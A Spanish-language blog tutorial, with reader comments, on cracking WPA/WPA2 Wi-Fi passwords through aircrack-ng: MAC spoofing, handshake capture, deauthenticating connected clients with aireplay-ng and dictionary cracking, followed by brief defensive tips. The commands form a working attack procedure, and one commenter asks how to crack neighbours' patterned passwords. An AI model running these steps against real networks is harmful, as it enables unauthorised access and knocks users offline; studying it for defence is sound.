viernes, 17 de enero de 2014

Hackear WPA WPA2 sin WPS

Hoy os traigo un enigma en el mundo wifi, ¿Puedo hackear una wifi WPA2 sin WPS?.

Pues a pedido de las miembros de Backtrack Academy esto va por vosotros gente, disfrutenlo ;)

¿Que vamos hacer?
Vamos a elegir una wifi con cifrado WPA2 / WPA PSK y sacaremos su contraseña.

¿Que necesitamos?
Un portatil con 1 maquina virtual con Kali Linux o Backtrack para usar la suite de aircrack y una antena wifi, yo usare mi inseparable Alfa AWUSH036H por usb y un diccionario que explicaremos cuando se vaya a necesitar.

Buscamos a la victima
La victima seremos nosotros mismos, en mi caso he configurado el router con WPA2 y una clave relativamente compleja.




Lo primero que haremos sera que Kali detecte nuestra tarjeta wifi.
airmon


Ahora cambiaremos nuestra MAC para despistar. Debemos desactivarla, asignar la nueva y volverla a activar:
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55
ifconfig wlan0 up
cambiando mac


Vamos a hacer un barrido para ver todos los puntos de acceso .Podemos usar genericamente: airodump-ng mon0 para localizar los datos que necesitaremos en el siguiente paso.
analisis red


Ahora capturamos paquetes hasta conseguir el Handshake.
airodump-ng --bssid 5C:33:8E:A7:D4:B8 -c 7 -w wpa2labs.cap mon0

--bssid 5C:33:8E:A7:D4:B8: Mac del router
-c 7: Canal del router
-w wpa2labs.cap : archivo .cap donde se guardara el análisis del traficomon0: interfaz de red

airodump


Para capturar el handshake tenemos 2 opciones: esperar a que se conecte un nuevo cliente o desautentificar a los que estan para que se vuelvan a conectar.

Yo elijo la segunda, usamos aireplay-ng para esto:
aireplay-ng -0 30 -a 5C:33:8E:A7:D4:B8 mon0

-0 30: Enviamos 30 Desautentificaciones
-a 5C:33:8E:A7:D4:B8: Mac del router
mon0: interfaz de red
aireplay


Una vez lo tenemos usaremos nuestro diccionario, puedes creartelo tu o puedes hacerlo. Simplemente es un bloc de notas con una contraseña por linea.
aircrack-ng -w 10kcommon.txt wpa2labs-01.cap

-w 10kcommon.txt: Es el diccionario que he creado
wpa2labs-01.cap: Es el archivo que se creo en los pasos anteriores
aireplay

Ahora empezara a probar combinaciones hasta dar con la buena, dependiendo la longitud del diccionario y de la potencia de calculo del ordenador dependera el tiempo de crackeo.
clave wifi

En el caso de necesitar diccionarios muy grandes podemos crear rainbow tables con airolib-ng.

¿Como evitar ser victima de este ataque?
1. Pon cifrado WPA o WPA2 
2. Desactiva el WPS o cambia el que viene por defecto
3. Pon una contraseña larga que no se use en diccionarios, preferiblemente español para evitar los genéricos aunque sean fáciles de recordar ejemplo: lasgallinasponenhuevos00
howsecureismypassword



Saludos guerreros!

9 comentarios:

  1. SE PUEDE HACKEAR CON ESTE METODO SI TIENE DESACTIVADO WPS??

    ResponderEliminar
  2. Si, por WPS se ataca a un pin de 4 u 8 números, mientras que por este método, es mediante diccionario de palabras hasta que da con la correcta, las posibilidades de éxito dependerán de la velocidad de intentos(contraseñas / segundo), la dureza de la contraseña, el idioma, el diccionario introducido y algo de suerte, en todo caso este método se puede demorar horas, días, meses o años.

    ResponderEliminar
  3. Donde puedo descargar un buen diccionario para el kali

    ResponderEliminar
    Respuestas
    1. Tal vez podrías echar un ojo aquí : http://cyberwarzone.com/cyberwarfare/password-cracking-mega-collection-password-cracking-word-lists
      o aquí : https://www.youtube.com/watch?v=gNR_rgaH_oo
      Saludos
      =D

      Eliminar
  4. Hola, al momento de querer realizar el barrido, me arroja un tipo de error , nl puedo escanear las redes :/ no se que es lo que pasa, eh seguido cada uno de los pasos, pero no me resulta. Al momento de poner ''airodump-ng mon0'' no me lanza la lista de las redes disponibles, al contrario, me sale ''Interface mon0:
    ioctl(SIOCGIFINDEX) failed: No such device''...

    Y hasta ahi llego.... Alguien tiene alguna solucion?
    Saludos. Y atento a sus respuestas.

    ResponderEliminar
    Respuestas
    1. Hola Khali, el primer fallo que me viene a la cabeza es que no hayas levantado el interfaz mon0. usa: airmon-ng wlanX

      Saludos!!

      Eliminar
  5. Muchas gracias por el aporte, yo había leido una guía de como hackear una wifi pero era para Wps

    ResponderEliminar
  6. Hola, por donde vivo todas las contraseñas son un nombre (el mismo nombre en todos los casos) y 4 numeros hay una forma de hacer el ataque pero indicando que solo busque los ultimos 4 digitos?

    ResponderEliminar
  7. Muy interesante la verdad, habia leido tu articulo de como instalar Tor en windows y me estoy enganchando al blog :D

    ResponderEliminar